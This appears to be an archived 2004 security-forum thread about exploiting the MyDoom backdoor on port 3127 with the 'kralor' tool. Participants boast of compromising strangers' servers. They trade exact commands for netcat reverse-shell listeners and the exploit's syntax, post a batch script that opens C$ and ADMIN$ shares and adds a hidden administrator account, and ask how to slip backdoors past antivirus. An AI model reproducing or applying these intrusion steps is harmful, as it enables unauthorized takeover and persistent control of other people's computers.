By the way guys in here.. Don't use those exploits/tools on other computers that your own/or testing it with friends... And for those that didnt know that im not a blackhat, they know it now Im a 99.9999% Whitehat security coder/whatsoever. And please, I dont help to hack, I help to find the vulnerabilities so the big companies, virusscanners etc.. That they can protect the computers from getting caught.. What a good thing I did do on some friends, was this, I just uploaded the fixer via my tool and whooops MyDoom and of course the backdoor was gone. Help me clean the MyDoom's away and start DELETING the MyDoom viruses. For those that don't do this, they arent under my respect... Thanks
i do it for my school that's why i got A in computers hehe
Vosgia
Feb 11 2004, 08:17 AM
every server where i get in, i make and will make a folder on the desktop " HACKED .... plz secure again the mydoom virus" so i think i will help many firms, private people who didn't secure their servers yet.
tba
Feb 11 2004, 08:38 AM
and also 99.99999% is patched because this virus was broadcasted all over the world so people are patching like hell.
Exploits like rpc and wks or dameware dont go on air, so that takes longer that ppl patches their pc's
greetz TBA
eXist
Feb 11 2004, 09:12 AM
Do you have file extensions turned on? All this stuff works fine, except if you have no admin rights. BTW excellent work sPiKie, your compiled code is working no probs
QuadMedic
Feb 11 2004, 11:34 AM
this thing is dead ...... to tell the truthe it was never realy alive....
Pgame
Feb 11 2004, 03:32 PM
very nice post
lets test ...
hitu
Feb 11 2004, 04:56 PM
works good.. nice exploit..
zarp
Feb 11 2004, 05:12 PM
yeah nice thx for sharing
jos40
Feb 11 2004, 06:37 PM
very good indeed a lot of vulnerable servers i got with my first scan
Arnie
Feb 11 2004, 08:05 PM
yep great thing, guess people hacked a lot of pr0n browing students on phat pipes
Kynroxes
Feb 11 2004, 09:03 PM
coromputer pawa !!
Milka
Feb 11 2004, 10:14 PM
I agree with Spikie but then if you want this purelly for security then you wouldnt post it here...
btw most ISPs have port 3127 blocked allready;)
Milka
Feb 11 2004, 10:16 PM
QUOTE (QuadMedic @ Feb 11 2004, 11:34 AM)
this thing is dead ...... to tell the truthe it was never realy alive....
I don't know what you mean by alive, but the worm itself is still alive and kickin' the only thing is... you can't exploit it.... mydoom.b is maybe more active then
MysteryMan
Feb 11 2004, 11:31 PM
uuuu dead ..... :/ but lovesun is good ...
peace ...
HAnzsz
Feb 12 2004, 10:29 AM
hmmmm maybe I am trying to exploit applications
but I havent exploited a single ip with port 3127 open too bad
KeKeTTe
Feb 12 2004, 11:52 PM
nice exploit , i will test it big thx kiss
Fooldj
Feb 13 2004, 02:45 AM
hm..thnx for this, i'll have to test it out, also seen another reverse shell program for this also, haven't tested it yet tho
XeviL
Feb 13 2004, 09:43 AM
I have a problem. When i upload a shell with my ip and port 8080 and set netcat listening on my computer on port 8080 then that does nothing. WHY??
caze
Feb 13 2004, 10:51 AM
maybe there is a fierwall ?
mathofaka
Feb 13 2004, 06:28 PM
i am clue less... i dont know the steps.. any one can help me plz do.. if u cant reach me then eamil it to jzthug44@yahoo.com
WaZa
Feb 13 2004, 08:50 PM
you (filtered) n00bs, just leave it. its even pointless to moan and cry over it now. if u can read a (filtered) 12 page thread and figure out how to do it, u probably never will. most people who arent getting a shell probably need to set port forwarding and the other half, the new worm has been patching most of the systems so only a few thousands remain, so the odds are very low.
Gargamel
Feb 13 2004, 09:33 PM
QUOTE
you (filtered) n00bs, just leave it. its even pointless to moan and cry over it now. if u can read a (filtered) 12 page thread and figure out how to do it, u probably never will. most people who arent getting a shell probably need to set port forwarding and the other half, the new worm has been patching most of the systems so only a few thousands remain, so the odds are very low.
Rofl but its right what he sad...
cye
Feb 14 2004, 02:36 AM
Hi!
The exploit/technique worx great. At leas with MyDoom.A. Could anybody send me MyDoom.B, C and/or Doomjouce.B for testing? (Please zip them with password written in the mail, 'cause my server deletes the virus files ) Does this thing work with the new variants too? (With the appropriate ports of course) Or has the password changed?
Thx: Cye (cziber@ludens.elte.hu)
mofo
Feb 14 2004, 03:02 AM
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
slb33
Feb 14 2004, 04:12 AM
port 666 is not the correct port to connect to the victim. 666 is the port that it is going to connect back to you on!
mofo
Feb 14 2004, 04:30 AM
so how do i do this, i will gladly reward anyone that helps me
Nexcess
Feb 14 2004, 05:06 AM
Give up, ffs, give up, its dead, its been dead for 48 hours now. The worm stopped propigating on the 12th, the ones that weren't hacked and patched to prevent rehacking have been cleaned by av, or the new worm(stupid anti-worm worms).
MattMannLT
Feb 14 2004, 06:21 AM
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
Alien
Feb 14 2004, 08:36 AM
QUOTE (MattMannLT @ Feb 14 2004, 06:21 AM)
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
you wrong
its
CODE
mykalor.exe <victims ip> PORT c:\directory\shell.exe
Gargamel
Feb 14 2004, 10:25 AM
no thats wrong, i do it with mykralor.exe IP PORT blub.exe and it works...
oYost
Feb 14 2004, 02:57 PM
Just a thing for thoses who can't use the reverse shell : share IPC on the computer with a bat like this :
CODE
net share IPC$ net share C$=c: net share ADMIN$ net user LocalInternet YourPAss /add net localgroup Administrators LocalInternet /add exit
I think it won't work on the XP system computers, but will on the others
I hope it's working (this exploit doesn't want to work with me ^^ so i can't test) and it's a greet share Spikie
Trojan^kid
Feb 14 2004, 04:02 PM
nice Exploit thanks man i have scaned on port 3127 Didnt find any one yet thanks agine
ma5t3r
Feb 14 2004, 04:35 PM
hi
thx its n1ce and the best it works ;-)
thx
MattMannLT
Feb 14 2004, 04:44 PM
QUOTE (Alien @ Feb 14 2004, 08:36 AM)
QUOTE (MattMannLT @ Feb 14 2004, 06:21 AM)
QUOTE (mofo @ Feb 14 2004, 03:02 AM)
i need help, i find a machine vulnerable on port 3127 i have a bat with "nc -l -vv -p 666" i launch that and it says listening on port 666 then i launch rsCRT.exe and enter in my ip and port 666 then i save it as shell.exe then in dos i type mykalor.exe <victims ip> port 666 shell.exe and it does nothing what am i doing wrong?
its not
CODE
mykalor.exe <victims ip> port 666 shell.exe
its
CODE
mykalor.exe <victims ip> 666 shell.exe
wheres my reward
you wrong
its
CODE
mykalor.exe <victims ip> PORT c:\directory\shell.exe
well i have mine in the same drectory as mrkralor and it works fine so i guess if it was in a different directory you should put the path to it
DyNaMiTe
Feb 14 2004, 05:06 PM
Axaxa nice work, kralor is the best i think!! Hey you there is not port 3127 (is a joke)) Read carefoull Nice post!!
koursky
Feb 20 2004, 08:16 PM
first thanks a lot for this informations but i have a question is that possible that with my router i couldn't received the remote shell ? thx
iFan
Feb 20 2004, 11:41 PM
no you have to open the port 3127 ... or the port where you want to get a shell
(sry 4 my engl)
greetz
Junta
Feb 20 2004, 11:48 PM
I have a problem 1 Run netcat 'nc.exe -l -vv -p 3127' after run rsCRPT < my ip > listening port (3127) Create file save ( junta ) after run exploit mykralor mykralor < ip victim > 3127 junta
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
ok send file
listening port i see
and nothing
what the problem ?
sylver
Feb 20 2004, 11:54 PM
u have to use another port than 3127, try 3128 or something in ur shell, because mydoom is running on 3127<<this port u have to scan
Yemoke
Feb 20 2004, 11:55 PM
I dont know what's your problem but mydoom is dead already, the mydoom.a and b are replaced with mydoom.c, that one dont have a backdoor so the port stay's open but the file isnt executed when you upload it....(sorry for bad english)
sylver
Feb 21 2004, 12:12 AM
yes its really dead the same as dameware exploit :*(
dongfangshuo
Feb 21 2004, 05:46 AM
i have used it it work but i want to know how to add paramete of the exe i want to excute
Pro21
Feb 21 2004, 09:32 AM
Mydoom Backdoor execute automaticly the exe send. With Kralor epxloit you send a little exe compiled with rsCRPT qui open a shell. And the backdoor execute automaticly the exe send. If you want upload another file use another exploit without space limitation to send file. (you can upload a backdoor for exemple)
dongfangshuo
Feb 21 2004, 11:41 AM
there is a trouble thing that most of my backdoor is deleted by the anitvirus so i want to upload and excute software such an radmin or remote anything but these software will add a icon in the banner so it will be kill by administrator
Pro21
Feb 21 2004, 12:03 PM
It s why you must the kralor shell generator ....
Junta
Feb 21 2004, 12:18 PM
QUOTE (Junta @ Feb 20 2004, 11:48 PM)
I have a problem 1 Run netcat 'nc.exe -l -vv -p 3127' after run rsCRPT < my ip > listening port (3127) Create file save ( junta ) after run exploit mykralor mykralor < ip victim > 3127 junta
[+] Reading file to send (max length 1599bytes) ...Done [+] Connecting to infected ip ...Done [+] Sending file ...Done [+] Exiting.
ok send file
listening port i see
and nothing
what the problem ?
I have change to port of rsCRPT port : 666
i have always this problem
after i connect to telnet
telnet ip victim 666
failled connection :/ why???
Testing this ip victim
XX.XX.XX.XX <=== Mydoom - IP address edited by shaun2k2
jpno5
Feb 22 2004, 09:44 AM
y r u posting someones ip in an open forum that shouldnt b allowed
QUOTE
yes its really dead the same as dameware exploit :*(
dameware isnt dead i can assure u
shaun2k2
Feb 22 2004, 10:14 AM
Stop posting peoples IP addresses on this forum. This board was designed for government officials and anyone interested in computer security to hang out, have a laugh, and learn from other kind members here. Members are allowed indefinately to discuss exploits and their usage, but when you jeapardise peoples computer systems, you take it too far. Posting an IP address which is obviously infected is a stupidly irresponsible thing to do, and you know better.
This discussion can continue, but please keep it professional, that's what we are; mature adults. This is quite an interesting discussion so far, but please don't ask for step by step instructions. Remember guys; sometimes exploits are deliberately crippled. Ask yourself why .
-Shaun.
Gangster*
Feb 23 2004, 08:04 AM
Hi thanks for the exploit!
Is there a scanner that checks to see if it exploitable or not? not just a port scanner.
Thanks again!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Im a 99.9999% Whitehat security coder/whatsoever. And please, I dont help to hack, I help to find the vulnerabilities so the big companies, virusscanners etc.. That they can protect the computers from getting caught.. What a good thing I did do on some friends, was this, I just uploaded the fixer via my tool and whooops MyDoom and of course the backdoor was gone. Help me clean the MyDoom's away and start DELETING the MyDoom viruses. For those that don't do this, they arent under my respect... Thanks 
any one can help me plz do..
)
